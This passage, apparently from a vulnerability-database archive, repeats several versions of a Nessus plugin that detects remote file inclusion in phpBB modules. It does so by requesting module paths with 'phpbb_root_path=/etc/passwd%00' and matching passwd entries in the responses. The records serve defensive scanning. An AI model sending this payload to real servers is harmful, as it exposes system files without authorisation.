\"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. 
File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "type": "nessus", "viewCount": 0}, "differentElements": ["references", "modified", "sourceData"], "edition": 1, "lastseen": "2016-09-26T17:25:32"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. 
Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "edition": 2, "hash": "6f585a87ac0b735771ccebbabbcbc84d30ab14dc4f3072dcfe4c1e2edad5f905", "hashmap": [{"hash": "cd1acb6332b705efcfb274e39bdce0d5", "key": "title"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "eb7c1eabb2baa803f2635d2ba4792d3f", "key": "pluginID"}, {"hash": "69db04a1c80dd4a176e4f3d53561e805", "key": "cvelist"}, {"hash": "6249051a0279d3205c62b5abbee8dab7", "key": "modified"}, {"hash": "b8ec7988b9627a83f1d82122e582413e", "key": "description"}, {"hash": "e1c545920cd6605d0ceb58e4018cb510", "key": "sourceData"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8b5dc20b319b47100bd63d45b155e50c", "key": "published"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "6775ceea39a7459ac555a07fd9b6f1d3", "key": "references"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "9acce4448de96d820472fbc896512e35", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "lastseen": "2016-11-02T21:26:13", "modified": "2016-11-02T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.2", "pluginID": "21323", "published": "2006-05-04T00:00:00", "references": ["http://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?9640ab6a", "http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370", "http://www.phpbb2.de/ftopic45218.html", "http://seclists.org/bugtraq/2006/Oct/209", "http://www.securityfocus.com/archive/1/452012/30/0/threaded"], "reporter": 
"Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"$Revision: 1.36 $\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_osvdb_id(\n 25263,\n 29711,\n 29712,\n 29713,\n 29714,\n 29734,\n 29751,\n 31029,\n 35449,\n 35450,\n 38265,\n 38723,\n 38724,\n 38725\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. 
Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2006/Oct/209\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb2.de/ftopic45218.html\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"$Date: 2016/11/02 14:37:08 $\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n 
script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2016 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = \"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL itself\nmod[nmods++] = \"/includes/functions.php\";\n# - SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = 
\"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. 
File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "type": "nessus", "viewCount": 0}, "differentElements": ["references", "modified", "sourceData"], "edition": 2, "lastseen": "2016-11-02T21:26:13"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:phpbb_group:phpbb-auction"], "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. 
Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "edd7ee8e3a8af0edb691dfe69de82b00662dc8b2240e7e72ad1340eff430eec5", "hashmap": [{"hash": "cd1acb6332b705efcfb274e39bdce0d5", "key": "title"}, {"hash": "4e9ff411278dd1e0a2396e82da16469b", "key": "modified"}, {"hash": "fed7aede4a5f01a9fc080184a2dd8da8", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "eb7c1eabb2baa803f2635d2ba4792d3f", "key": "pluginID"}, {"hash": "69db04a1c80dd4a176e4f3d53561e805", "key": "cvelist"}, {"hash": "b8ec7988b9627a83f1d82122e582413e", "key": "description"}, {"hash": "c4b485d682c254d7a96e0721a51e4986", "key": "sourceData"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8b5dc20b319b47100bd63d45b155e50c", "key": "published"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "737e2591b537c46d1ca7ce6f0cea5cb9", "key": "cvss"}, {"hash": "65920404be9df979f281f296ff035289", "key": "cpe"}, {"hash": "9acce4448de96d820472fbc896512e35", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "lastseen": "2018-07-30T14:08:21", "modified": "2018-07-24T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "21323", "published": "2006-05-04T00:00:00", "references": ["http://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?9640ab6a", "http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370", "http://www.nessus.org/u?37fd2995", "http://seclists.org/bugtraq/2006/Oct/209", 
"http://www.securityfocus.com/archive/1/452012/30/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"1.39\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. 
Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2006/Oct/209\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n # https://web.archive.org/web/20160820141912/http://www.phpbb2.de/ftopic45218.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37fd2995\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n 
script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = \"/language/lang_german/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_german/lang_admin_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_main_album.php\";\nmod[nmods++] = \"/language/lang_english/lang_admin_album.php\";\n# - PlusXL 
itself\nmod[nmods++] = \"/includes/functions.php\";\n# - SpamBlockerMod\nmod[nmods++] = \"/includes/antispam.php\";\n\n\ninfo = \"\";\ncontents = \"\";\n\n\n# Test an install.\ninstall = get_kb_item(string(\"www/\", port, \"/phpBB\"));\nif (isnull(install)) exit(0);\nmatches = eregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!isnull(matches)) {\n dir = matches[2];\n\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<nmods; i++)\n {\n r = http_send_recv3(method:\"GET\", \n item:string(\n dir, mod[i], \"?\",\n \"phpbb_root_path=\", file\n ), \n port:port\n );\n if (isnull(r)) exit(0);\n res = r[2];\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"main\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"main\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. 
File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n contents = res - strstr(res, \"<br\");\n\n if (!thorough_tests) break;\n }\n }\n}\n\nif (info)\n{\n if (contents)\n {\n contents = data_protection::redact_etc_passwd(output:contents);\n info = string(\n info,\n \"\\n\",\n \"And here are the contents of the file '/etc/passwd' that Nessus\\n\",\n \"was able to read from the remote host :\\n\",\n \"\\n\",\n contents\n );\n }\n report = string(\n \"The following scripts(s) are vulnerable :\\n\",\n \"\\n\",\n info\n );\n\n security_warning(port:port, extra:report);\n}\n", "title": "phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion", "type": "nessus", "viewCount": 0}, "differentElements": ["cvss"], "edition": 6, "lastseen": "2018-07-30T14:08:21"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:phpbb_group:phpbb-auction"], "cvelist": ["CVE-2006-7090", "CVE-2006-5301", "CVE-2006-5418", "CVE-2006-7100", "CVE-2007-5009", "CVE-2006-5390", "CVE-2006-7147", "CVE-2006-2245", "CVE-2007-5100", "CVE-2006-5306"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the remote host fails to sanitize input to the 'phpbb_root_path' parameter before using it to include PHP code. 
Provided PHP's 'register_globals' setting is enabled, an unauthenticated attacker may be able to exploit these flaws to view arbitrary files on the remote host or to execute arbitrary PHP code, possibly taken from third-party hosts.", "edition": 7, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "fc5d8f4f63a25cc6ab6c229130a861452a7855a979971b2d282661d17de77ca5", "hashmap": [{"hash": "cd1acb6332b705efcfb274e39bdce0d5", "key": "title"}, {"hash": "4e9ff411278dd1e0a2396e82da16469b", "key": "modified"}, {"hash": "fed7aede4a5f01a9fc080184a2dd8da8", "key": "references"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "eb7c1eabb2baa803f2635d2ba4792d3f", "key": "pluginID"}, {"hash": "69db04a1c80dd4a176e4f3d53561e805", "key": "cvelist"}, {"hash": "b8ec7988b9627a83f1d82122e582413e", "key": "description"}, {"hash": "c4b485d682c254d7a96e0721a51e4986", "key": "sourceData"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8b5dc20b319b47100bd63d45b155e50c", "key": "published"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "65920404be9df979f281f296ff035289", "key": "cpe"}, {"hash": "9acce4448de96d820472fbc896512e35", "key": "href"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=21323", "id": "PHPBB_AUCTION_PHPBB_ROOT_PATH_FILE_INCLUDE.NASL", "lastseen": "2018-08-30T19:49:30", "modified": "2018-07-24T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "21323", "published": "2006-05-04T00:00:00", "references": ["http://www.securityfocus.com/archive/1/479997/30/0/threaded", "http://www.nessus.org/u?9640ab6a", "http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370", "http://www.nessus.org/u?37fd2995", "http://seclists.org/bugtraq/2006/Oct/209", 
"http://www.securityfocus.com/archive/1/452012/30/0/threaded"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(21323);\n script_version(\"1.39\");\n\n script_cve_id(\n \"CVE-2006-2245\",\n \"CVE-2006-5301\",\n \"CVE-2006-5306\",\n \"CVE-2006-5390\",\n \"CVE-2006-5418\",\n \"CVE-2006-7090\",\n \"CVE-2006-7100\",\n \"CVE-2006-7147\",\n \"CVE-2007-5009\",\n \"CVE-2007-5100\"\n );\n script_bugtraq_id(\n 17822, \n 20484, \n 20485, \n 20493, \n 20501, \n 20518, \n 20525, \n 20558, \n 20571, \n 21171, \n 25737, \n 25776\n );\n script_xref(name:\"EDB-ID\", value:\"2483\");\n script_xref(name:\"EDB-ID\", value:\"2522\");\n script_xref(name:\"EDB-ID\", value:\"2525\");\n script_xref(name:\"EDB-ID\", value:\"2533\");\n script_xref(name:\"EDB-ID\", value:\"2538\");\n\n script_name(english:\"phpBB Multiple Module phpbb_root_path Parameter Remote File Inclusion\");\n script_summary(english:\"Tries to read a local file using phpBB modules\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is prone to\nremote file include attacks.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The remote host contains a third-party module for phpBB. \n\nThe version of at least one such component or module installed on the\nremote host fails to sanitize input to the 'phpbb_root_path' parameter\nbefore using it to include PHP code. 
Provided PHP's\n'register_globals' setting is enabled, an unauthenticated attacker may\nbe able to exploit these flaws to view arbitrary files on the remote\nhost or to execute arbitrary PHP code, possibly taken from third-party\nhosts.\" );\n # http://web.archive.org/web/20070527141033/http://pridels.blogspot.com/2006/05/phpbb-auction-mod-remote-file.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9640ab6a\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/bugtraq/2006/Oct/209\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpbb.com/phpBB/viewtopic.php?p=2504370&highlight=#2504370\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/452012/30/0/threaded\" );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.securityfocus.com/archive/1/479997/30/0/threaded\" );\n # https://web.archive.org/web/20160820141912/http://www.phpbb2.de/ftopic45218.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?37fd2995\" );\n script_set_attribute(attribute:\"solution\", value:\n\"Disable PHP's 'register_globals' setting or contact the product's\nauthor to see if an upgrade exists.\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2006/05/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2006/05/03\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n 
script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/a:phpbb_group:phpbb-auction\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"phpbb_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpBB\");\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"data_protection.inc\");\n\nport = get_http_port(default:80);\nif (!can_host_php(port:port)) exit(0);\n\n\n# Vulnerable scripts.\n# - modules\nnmods = 0;\nmod = make_array();\n# - ACP User Registration\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Admin User Viewed Posts Tracker\nmod[nmods++] = \"/includes/functions_user_viewed_posts.php\";\n# - AI chat (included in PlusXL)\nmod[nmods++] = \"/mods/iai/includes/constants.php\";\n# - Import Tools - Members\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Insert User\nmod[nmods++] = \"/includes/functions_mod_user.php\";\n# - Journals System\nmod[nmods++] = \"/includes/journals_delete.php\";\nmod[nmods++] = \"/includes/journals_edit.php\";\nmod[nmods++] = \"/includes/journals_post.php\";\n# - phpBB auction\nmod[nmods++] = \"/auction/auction_common.php\";\n# - phpBB Search Engine Indexer\nmod[nmods++] = \"/includes/archive/archive_topic.php\";\n# - phpBB Security\nmod[nmods++] = \"/includes/phpbb_security.php\";\n# - phpBB2 Plus (not really a mod)\nmod[nmods++] = 